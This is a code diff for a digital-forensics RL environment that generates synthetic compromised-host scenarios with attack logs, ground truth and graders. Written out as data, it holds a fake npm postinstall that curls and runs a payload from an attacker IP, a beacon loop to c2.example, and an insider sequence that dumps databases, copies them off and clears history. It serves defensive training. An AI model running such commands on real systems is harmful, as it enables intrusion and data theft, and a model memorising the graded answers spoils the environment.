+    postinstall = (
+        f"// postinstall.js -- dropped by malicious {pkg}\n"
+        "const { exec } = require('child_process');\n"
+        f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n"
+    )
+    modified_files = {
+        f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey from {ip}"},
+        {"phase": "recon", "detail": f"npm view {pkg}"},
+        {"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"},
+        {"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"},
+        {"phase": "exfil", "detail": f"backdoor beacons to {ip}"},
+    ]
+    return dict(
+        pattern_tag="supply_chain",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 5 — insider threat: legit user exfiltrates db from internal network
+# ---------------------------------------------------------------------------
+def insider(ctx):
+    """
+    Build artifacts for the insider pattern: a publickey login, a sudo
+    mysqldump of all databases, a staged copy under /tmp/.staging and an scp
+    of the dump to laptop.internal.
+    Reads ctx.user, ctx.ip, ctx.host, ctx.ts_base, ctx.rng, ctx.backdoor_path
+    and ctx.backdoor_bytes. Returns a dict with pattern_tag, auth_log_lines,
+    bash_history, modified_files, modified_paths and timeline.
+    """
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    # NOTE(review): an earlier comment here said the insider's IP is
+    # overridden with an internal address, but this function performs no
+    # override: ctx.ip is used as given. Presumably the generator supplies an
+    # internal address for this pattern; verify against caller.
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo:    {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
+        f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo:    {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
+    ]
+    # The history ends with an rm of the staged copy, yet modified_files below
+    # still contains /tmp/.staging/dump.sql.
+    bash = (
+        f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
+        f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
+        f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
+        f"rm /tmp/.staging/dump.sql\n"
+        f"history -c\n"
+    )
+    dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
+    # The staged copy differs from the dump by one header line.
+    staging_content = b"-- staged copy\n" + dump_content
+    modified_files = {
+        "/var/lib/mysql/dump.sql": dump_content,
+        "/tmp/.staging/dump.sql": staging_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
+        {"phase": "recon", "detail": "ls /var/lib/mysql"},
+        {"phase": "privesc", "detail": "user already had sudo"},
+        {"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
+        {"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
+    ]
+    return dict(
+        pattern_tag="insider",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            "/var/lib/mysql/dump.sql",
+            "/tmp/.staging/dump.sql",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
+# Registry mapping each pattern slug to its builder function. Every key equals
+# the `pattern_tag` value that the corresponding builder returns.
+PATTERNS = {
+    "ssh_brute": ssh_brute,
+    "ssh_key_theft": ssh_key_theft,
+    "webshell": webshell,
+    "supply_chain": supply_chain,
+    "insider": insider,
+}

server/forensic_shell_environment.py CHANGED Viewed

@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
 import hashlib
 import os
 from typing import Dict, List, Optional, Tuple
 from uuid import uuid4
 from openenv.core.env_server.interfaces import Environment
-from openenv.core.env_server.types import State
 try:
     from ..models import ForensicShellAction, ForensicShellObservation
@@ -24,14 +25,49 @@ except ImportError:
 try:
     from .grader import grade
     from .scenarios import DEFAULT_TASK_ID, SCENARIOS
 except ImportError:
-    from grader import grade
-    from scenarios import DEFAULT_TASK_ID, SCENARIOS
 MAX_STEPS_PER_EPISODE = 30
 def _as_bytes(content) -> bytes:
     if isinstance(content, bytes):
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
         self._fs: Dict[str, object] = {}
         self._done: bool = False
         self._steps_used: int = 0
     # ---- episode lifecycle ---------------------------------------------------
     def reset(
-        self, task_id: Optional[str] = None, **kwargs
     ) -> ForensicShellObservation:
-        env_task = os.getenv("FORENSIC_TASK_ID")
-        chosen = task_id or env_task or DEFAULT_TASK_ID
-        if chosen not in SCENARIOS:
-            chosen = DEFAULT_TASK_ID
-        self._task_id = chosen
-        self._scenario = SCENARIOS[chosen]
         self._fs = dict(self._scenario["filesystem"])
         self._done = False
         self._steps_used = 0
         self._state = State(episode_id=str(uuid4()), step_count=0)
         return ForensicShellObservation(
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
                 return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "read_file":
-                out, err = self._do_read_file(action.path or "", action.max_bytes or 2048)
-                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "grep":
-                out, err = self._do_grep(action.pattern or "", action.path or "")
-                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "stat":
                 out, err = self._do_stat(action.path or "")
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
                 reward=0.0,
             )
     # ---- action primitives ---------------------------------------------------
     def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
             metadata=meta,
         )
-    # ---- state property ------------------------------------------------------
     @property
     def state(self) -> State:
         return self._state

 import hashlib
 import os
+from pathlib import Path
 from typing import Dict, List, Optional, Tuple
 from uuid import uuid4
 from openenv.core.env_server.interfaces import Environment
+from openenv.core.env_server.types import EnvironmentMetadata, State
 try:
     from ..models import ForensicShellAction, ForensicShellObservation
 try:
     from .grader import grade
+    from .scenario_generator import generate_scenario
     from .scenarios import DEFAULT_TASK_ID, SCENARIOS
 except ImportError:
+    from grader import grade  # type: ignore
+    from scenario_generator import generate_scenario  # type: ignore
+    from scenarios import DEFAULT_TASK_ID, SCENARIOS  # type: ignore
 MAX_STEPS_PER_EPISODE = 30
+# Exploration shaping reward — small positive reward the first time the agent
+# reads or greps one of the scenario's "canonical forensic artifacts"
+# (auth.log, bash histories, cron files, backdoor path, etc.). The cumulative
+# shaping per episode is capped at SHAPING_REWARD_CAP so it stays small next to
+# the terminal grader reward, which lies in [0, 1].
+# Reward granted for each first-time touch of a canonical artifact.
+SHAPING_REWARD_PER_READ = 0.02
+# Upper bound on the summed shaping reward (five full grants reach it).
+SHAPING_REWARD_CAP = 0.10
+def _canonical_artifacts(scenario: dict) -> set:
+    """
+    Pick out the set of paths in a scenario that a good investigator *should*
+    read. For hand-authored scenarios we use the ground-truth modified_files
+    plus a fixed set of classic forensic log paths. For generated scenarios we
+    also include the bash history of the compromised user.
+    """
+    gt = scenario.get("ground_truth", {}) or {}
+    paths: set = set()
+    paths.update(gt.get("modified_files", []) or [])
+    for p in (
+        "/var/log/auth.log",
+        "/var/log/auth.log.1",
+        "/etc/passwd",
+        "/etc/shadow",
+    ):
+        if p in scenario.get("filesystem", {}):
+            paths.add(p)
+    user = gt.get("compromised_user")
+    if user:
+        bh = f"/home/{user}/.bash_history"
+        if bh in scenario.get("filesystem", {}):
+            paths.add(bh)
+    return paths
 def _as_bytes(content) -> bytes:
     if isinstance(content, bytes):
         self._fs: Dict[str, object] = {}
         self._done: bool = False
         self._steps_used: int = 0
+        self._useful_read: set = set()      # paths already rewarded
+        self._shaping_total: float = 0.0    # running sum, capped at SHAPING_REWARD_CAP
+        self._canonical: set = set()        # per-episode canonical artifact set
     # ---- episode lifecycle ---------------------------------------------------
     def reset(
+        self,
+        task_id: Optional[str] = None,
+        seed: Optional[int] = None,
+        difficulty: Optional[int] = None,
+        pattern: Optional[str] = None,
+        **kwargs,
     ) -> ForensicShellObservation:
+        """
+        Load either a hand-authored scenario (by task_id) OR a procedurally
+        generated one (by seed+difficulty+pattern). If seed is given, generator
+        wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
+        """
+        if seed is not None:
+            scenario = generate_scenario(
+                seed=int(seed),
+                difficulty=int(difficulty) if difficulty is not None else 3,
+                pattern=pattern,
+            )
+            self._task_id = scenario["task_id"]
+            self._scenario = scenario
+        else:
+            env_task = os.getenv("FORENSIC_TASK_ID")
+            chosen = task_id or env_task or DEFAULT_TASK_ID
+            if chosen not in SCENARIOS:
+                chosen = DEFAULT_TASK_ID
+            self._task_id = chosen
+            self._scenario = SCENARIOS[chosen]
         self._fs = dict(self._scenario["filesystem"])
         self._done = False
         self._steps_used = 0
+        self._useful_read = set()
+        self._shaping_total = 0.0
+        self._canonical = _canonical_artifacts(self._scenario)
         self._state = State(episode_id=str(uuid4()), step_count=0)
         return ForensicShellObservation(
                 return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "read_file":
+                path = action.path or ""
+                out, err = self._do_read_file(path, action.max_bytes or 2048)
+                shaped = self._award_shaping(path) if err is None else 0.0
+                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
             if verb == "grep":
+                path = action.path or ""
+                out, err = self._do_grep(action.pattern or "", path)
+                shaped = self._award_shaping(path) if err is None else 0.0
+                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
             if verb == "stat":
                 out, err = self._do_stat(action.path or "")
                 reward=0.0,
             )
+    # ---- shaping reward -----------------------------------------------------
+    def _award_shaping(self, path: str) -> float:
+        """
+        Return +SHAPING_REWARD_PER_READ the first time the agent touches a
+        canonical forensic artifact, capped so the cumulative shaping stays
+        <= SHAPING_REWARD_CAP across the episode.
+        """
+        if not path or path not in self._canonical:
+            return 0.0
+        if path in self._useful_read:
+            return 0.0
+        if self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP:
+            return 0.0
+        self._useful_read.add(path)
+        grant = min(SHAPING_REWARD_PER_READ, SHAPING_REWARD_CAP - self._shaping_total)
+        self._shaping_total += grant
+        return float(grant)
     # ---- action primitives ---------------------------------------------------
     def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
             metadata=meta,
         )
+    # ---- state + metadata ----------------------------------------------------
     @property
     def state(self) -> State:
         return self._state
+    def get_metadata(self) -> EnvironmentMetadata:
+        """
+        Override the OpenEnv default to populate the /metadata endpoint with a real
+        name, description, embedded README, version, author, and docs URL — instead
+        of the boilerplate auto-derived from the class name.
+        """
+        readme_path = Path(__file__).resolve().parent.parent / "README.md"
+        readme_content: Optional[str] = None
+        if readme_path.exists():
+            try:
+                readme_content = readme_path.read_text(encoding="utf-8")
+            except OSError:
+                readme_content = None
+        return EnvironmentMetadata(
+            name="ForensicShell",
+            description=(
+                "Digital-forensics investigation environment for OpenEnv RL. The "
+                "agent reads logs, hashes backdoors, and reconstructs attacker "
+                "kill-chains across 5 attack patterns and 5 difficulty tiers. "
+                "Procedural scenarios via deterministic seeds; deterministic "
+                "graders return rewards in [0, 1] with partial credit (Jaccard, "
+                "F1, Kendall-tau)."
+            ),
+            readme_content=readme_content,
+            version="0.2.0",
+            author="yashppawar",
+            documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
+        )

server/grader.py CHANGED Viewed

@@ -122,9 +122,26 @@ GRADERS = {
 }
 def grade(task_id: str, report: Dict, truth: Dict) -> float:
     """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
-    fn = GRADERS.get(task_id)
     if fn is None:
         return 0.0
     score = fn(report or {}, truth or {})

 }
+def _grade_generic(report: Dict, truth: Dict) -> float:
+    """
+    Dispatcher for procedurally generated scenarios. Picks the right sub-grader
+    by inspecting which fields are present in the ground-truth dict. This keeps
+    the grader agnostic to task_id naming and lets the generator add richer
+    fields without touching this module.
+    """
+    if "timeline" in truth:
+        return _grade_t3_timeline(report, truth)
+    if "backdoor_sha256" in truth:
+        return _grade_t2_modified(report, truth)
+    return _grade_t1_login(report, truth)
 def grade(task_id: str, report: Dict, truth: Dict) -> float:
     """Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
+    if task_id and task_id.startswith("gen_"):
+        fn = _grade_generic
+    else:
+        fn = GRADERS.get(task_id)
     if fn is None:
         return 0.0
     score = fn(report or {}, truth or {})

server/name_pools.py ADDED Viewed

	@@ -0,0 +1,62 @@

+"""
+Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
+and IP addresses. Every public-looking IP comes from the RFC 5737 documentation
+ranges (internal traffic uses RFC 1918 private space), so the synthetic data can
+never collide with real production IPs.
+"""
+# Compromise-target pool: 30 common first names followed by 10 IT-flavored
+# service accounts (40 entries total). Excludes 'root' from the compromise
+# target pool because it's structurally weird ("root was compromised via ssh brute")
+# even though real incidents exist.
+USERNAMES = [
+    "alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
+    "ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
+    "quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
+    "yara", "zach", "maya", "theo", "lara", "jonas",
+    "devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
+    "releng", "admin2", "ops",
+]
+# Decoy (benign) user accounts used to populate /etc/passwd and /home.
+DECOY_USERS = [
+    "guest", "backup", "mail", "www-data", "postfix", "systemd-network",
+]
+# Host names a generated scenario can be set on.
+HOSTNAMES = [
+    "webhost", "db01", "api-gateway", "worker-03", "cache-redis",
+    "staging", "bastion", "ingest", "ci-runner", "monitoring",
+    "edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
+]
+# RFC 5737 "documentation" ranges — safe to use, never routable.
+# Each entry is the first three octets with a trailing dot; the sampler
+# appends the final octet.
+PUBLIC_CIDRS = [
+    "192.0.2.",    # TEST-NET-1
+    "198.51.100.", # TEST-NET-2
+    "203.0.113.",  # TEST-NET-3
+]
+# RFC 1918 private space — used for legit internal traffic noise and, in
+# scenario_generator.py, for the attacker address of the "insider" pattern.
+# Same three-octet-prefix format as PUBLIC_CIDRS.
+INTERNAL_CIDRS = [
+    "10.0.0.",
+    "10.0.1.",
+    "172.16.0.",
+    "192.168.1.",
+]
+def sample_public_ip(rng) -> str:
+    """Sample an attacker-looking IP from RFC 5737 test ranges."""
+    return rng.choice(PUBLIC_CIDRS) + str(rng.randint(2, 254))
+def sample_internal_ip(rng) -> str:
+    """Sample a legit-looking internal IP from RFC 1918."""
+    return rng.choice(INTERNAL_CIDRS) + str(rng.randint(2, 254))
+def sample_username(rng, exclude=()) -> str:
+    candidates = [u for u in USERNAMES if u not in exclude]
+    return rng.choice(candidates)
+def sample_hostname(rng) -> str:
+    return rng.choice(HOSTNAMES)

server/scenario_generator.py ADDED Viewed

	@@ -0,0 +1,315 @@

+"""
+Procedural scenario generator for ForensicShell.
+Pure function of (seed, difficulty, pattern). Identical inputs always produce
+identical scenarios, so seeds work as train/val/test splits and make curricula
+reproducible. No global random state is touched.
+Public API:
+    generate_scenario(seed, difficulty=3, pattern=None) -> dict
+The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
+scenarios.py — it is a drop-in replacement the env can load through reset().
+Difficulty tiers:
+    1  easy     user + ip
+    2  medium   + modified_files + backdoor_sha256
+    3  medium+  same fields as 2 (extra noise is not implemented yet)
+    4  hard     + timeline, with red-herring content
+    5  hard+    same as 4 with extra red herrings (same timeline as 4)
+"""
+from __future__ import annotations
+import hashlib
+import random
+from datetime import datetime, timedelta
+from types import SimpleNamespace
+from typing import Dict, Optional
+from .attack_patterns import PATTERNS
+from .name_pools import (
+    DECOY_USERS,
+    HOSTNAMES,
+    sample_hostname,
+    sample_internal_ip,
+    sample_public_ip,
+    sample_username,
+)
+# ---------------------------------------------------------------------------
+# Deterministic seed → backdoor bytes
+# ---------------------------------------------------------------------------
+def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
+    """
+    Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
+    (seed, pattern) so two generated scenarios with the same seed/pattern have
+    the same SHA256 — matches what the grader will compare against.
+    """
+    short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
+    header = (
+        f"#!/bin/sh\n"
+        f"# synthetic payload {pattern}\n"
+        f"# seed={seed} slug={short}\n"
+    ).encode()
+    body = (
+        f"while :; do\n"
+        f"  curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
+        f"  sleep 60\n"
+        f"done\n"
+    ).encode()
+    payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
+    return payload, hashlib.sha256(payload).hexdigest(), short
+def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
+    """Where the pattern drops its persistence blob."""
+    if pattern_tag == "webshell":
+        return f"/var/www/html/.{short}.bin"
+    if pattern_tag == "supply_chain":
+        return f"/tmp/.{short}"
+    if pattern_tag == "insider":
+        return "/tmp/.staging/dump.sql"
+    if pattern_tag == "ssh_key_theft":
+        return f"/usr/local/sbin/.{short}"
+    return f"/usr/local/bin/.{short}"
+# ---------------------------------------------------------------------------
+# Filesystem + ground-truth assembly
+# ---------------------------------------------------------------------------
+def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
+    """Render benign, plausible auth log entries to pad the log."""
+    out = []
+    for i in range(lines):
+        ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
+        who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
+        internal = "10.0.0." + str(rng.randint(2, 200))
+        kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
+        if kind == "Accepted publickey":
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
+            )
+        elif kind == "session opened":
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
+            )
+        else:
+            out.append(
+                f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
+                f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
+            )
+    return out
+def _passwd_file(main_user: str, rng) -> str:
+    users = list(DECOY_USERS) + [main_user]
+    rng.shuffle(users)
+    lines = ["root:x:0:0:root:/root:/bin/bash"]
+    uid = 1000
+    for u in users:
+        lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash")
+        uid += 1
+    return "\n".join(lines) + "\n"
+def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
+    """
+    Inject decoy content at difficulty >= 4.
+    Returns a dict of extra filesystem entries. None of these should end up in
+    ground_truth.modified_files.
+    intensity: 1 (diff 4) or 2 (diff 5+).
+    """
+    extras = {}
+    # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP
+    decoy_ip = sample_public_ip(rng)
+    extras["/var/log/auth.log.1"] = (
+        f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} "
+        f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
+        f"port {rng.randint(30000, 65000)} ssh2\n"
+        f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} "
+        f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
+    )
+    # 2. A decoy user's bash_history with suspicious-looking-but-benign commands
+    decoy_user = rng.choice(DECOY_USERS)
+    extras[f"/home/{decoy_user}/.bash_history"] = (
+        "ls -la\n"
+        "sudo systemctl status cron\n"
+        "curl https://api.github.com/users/torvalds\n"
+        "python3 -m http.server 8000 &\n"
+        "pkill -f http.server\n"
+    )
+    if intensity >= 2:
+        # 3. A /tmp/.cache binary with random bytes — agent might stat/sha it and submit wrongly
+        junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
+        extras["/tmp/.cache"] = junk
+        # 4. A decoy cron that looks suspicious but is benign
+        extras["/etc/cron.d/backup-nightly"] = (
+            "# Nightly backup — owned by ops team\n"
+            "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
+        )
+    return extras
+# ---------------------------------------------------------------------------
+# Main public function
+# ---------------------------------------------------------------------------
+def generate_scenario(
+    seed: int,
+    difficulty: int = 3,
+    pattern: Optional[str] = None,
+) -> Dict:
+    """
+    Deterministic scenario generator.
+    Args:
+        seed: any integer — identical inputs yield identical scenarios
+        difficulty: 1..5 (clamped)
+        pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed
+    Returns:
+        dict with keys: task_id, difficulty, description, filesystem, ground_truth
+    """
+    if difficulty < 1:
+        difficulty = 1
+    if difficulty > 5:
+        difficulty = 5
+    rng = random.Random(int(seed))
+    # 1. pick pattern
+    if pattern is None:
+        pattern = rng.choice(list(PATTERNS.keys()))
+    if pattern not in PATTERNS:
+        raise ValueError(f"unknown pattern: {pattern}")
+    # 2. sample entities
+    host = sample_hostname(rng)
+    main_user = sample_username(rng)
+    if pattern == "insider":
+        attacker_ip = sample_internal_ip(rng)
+    else:
+        attacker_ip = sample_public_ip(rng)
+    # 3. base timestamp — always in 2025, deterministic
+    day_offset = rng.randint(0, 365)
+    hour = rng.randint(8, 22)
+    minute = rng.randint(0, 59)
+    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)
+    # 4. synthesize backdoor payload
+    bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
+    bd_path = _backdoor_path_for(pattern, short, main_user)
+    ctx = SimpleNamespace(
+        rng=rng,
+        user=main_user,
+        ip=attacker_ip,
+        host=host,
+        ts_base=ts_base,
+        backdoor_bytes=bd_bytes,
+        backdoor_sha256=bd_sha,
+        backdoor_path=bd_path,
+        short=short,
+    )
+    # 5. run the pattern template
+    pattern_fn = PATTERNS[pattern]
+    result = pattern_fn(ctx)
+    # 6. build filesystem
+    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
+    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
+    filesystem: Dict[str, object] = {
+        "/var/log/auth.log": auth_log,
+        f"/home/{main_user}/.bash_history": result["bash_history"],
+        "/etc/passwd": _passwd_file(main_user, rng),
+        "/etc/hostname": f"{host}\n",
+        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
+    }
+    # add pattern-specific modified files
+    for path, content in result["modified_files"].items():
+        filesystem[path] = content
+    # 7. red herrings
+    if difficulty >= 4:
+        intensity = 1 if difficulty == 4 else 2
+        herrings = _red_herrings(rng, host, ts_base, intensity)
+        for path, content in herrings.items():
+            if path in filesystem:
+                continue  # never overwrite a real artifact
+            filesystem[path] = content
+    # 8. path-collision sanity check (duplicate keys impossible in a dict, but
+    #    ensure every ground-truth path actually exists in the filesystem)
+    for p in result["modified_paths"]:
+        assert p in filesystem, f"ground-truth path not in filesystem: {p}"
+    # 9. assemble ground truth by difficulty tier
+    gt: Dict = {
+        "compromised_user": main_user,
+        "initial_ip": attacker_ip,
+    }
+    if difficulty >= 2:
+        gt["modified_files"] = list(result["modified_paths"])
+        gt["backdoor_sha256"] = bd_sha
+    if difficulty >= 4:
+        gt["timeline"] = list(result["timeline"])
+    task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"
+    description = _describe(difficulty, pattern, main_user, host)
+    return {
+        "task_id": task_id,
+        "difficulty": _difficulty_label(difficulty),
+        "description": description,
+        "filesystem": filesystem,
+        "ground_truth": gt,
+    }
+# ---------------------------------------------------------------------------
+# Small helpers
+# ---------------------------------------------------------------------------
+def _difficulty_label(d: int) -> str:
+    return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
+def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
+    base = (
+        f"Host '{host}' was compromised. Investigate the filesystem to determine "
+        f"what happened. Start by reading /var/log/auth.log and the shell histories "
+        f"under /home."
+    )
+    if difficulty == 1:
+        return (
+            f"{base} Report: compromised_user and initial_ip only. "
+            f"(Pattern: {pattern})"
+        )
+    if difficulty in (2, 3):
+        return (
+            f"{base} Report: compromised_user, initial_ip, modified_files "
+            f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
+            f"(Pattern: {pattern})"
+        )
+    return (
+        f"{base} Report: compromised_user, initial_ip, modified_files, "
+        f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
+        f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
+        f"present. (Pattern: {pattern})"
+    )